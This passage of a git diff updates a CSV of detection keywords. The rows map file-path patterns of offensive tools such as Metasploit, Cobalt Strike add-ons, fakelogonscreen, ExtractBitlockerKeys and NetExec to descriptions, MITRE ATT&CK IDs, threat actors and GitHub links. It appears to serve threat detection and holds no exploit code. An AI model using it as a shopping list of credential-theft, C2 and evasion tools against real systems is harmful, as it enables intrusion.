Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" @@ -3558,64 +3571,65 @@ "*/exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" "*/expl/expl.go*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" "*/exploit.cron.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/exploit.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/exploit.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/exploit.ldpreload.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/exploit.pbj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/exploit/linux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/exploit/remote/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/exploit/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/exploit.pbj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit/linux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit/remote/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/exploit_orw.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" -"*/exploits/*.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/exploits/*.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/exports_function_hid.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*/ExternalC2/*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*/ExternalC2/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/ExtractBitlockerKeys.git*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","170","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*/ExtractBitlockerKeys.git*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" "*/f5_bigip_tmui_rce.rb*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" "*/Fa1c0n35/zabbix-cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" -"*/fake.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*/FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/fake.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*/fakelogonscreen*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" -"*/fake-sms.git*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*/fake-sms.git*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/Farmer.git*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*/fastfuz-chrome-ext*","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","23","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" -"*/fb_firstlast.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"*/fb_firstlast.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "*/fb-brute.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/febinrev/dirtypipez-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" "*/fern-wifi-cracker/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ffuf.git*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*/ffuf/ffufrc*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*/ffuf.git*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*/ffuf/ffufrc*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*/fiesta.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/fiesta2.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*/FilelessPELoader*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","148","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" -"*/final_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","554","107","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/FilelessPELoader*","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","1","N/A","10","8","727","149","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z" +"*/final_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" "*/find_domain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" +"*/find-computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/FindModule.c*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - 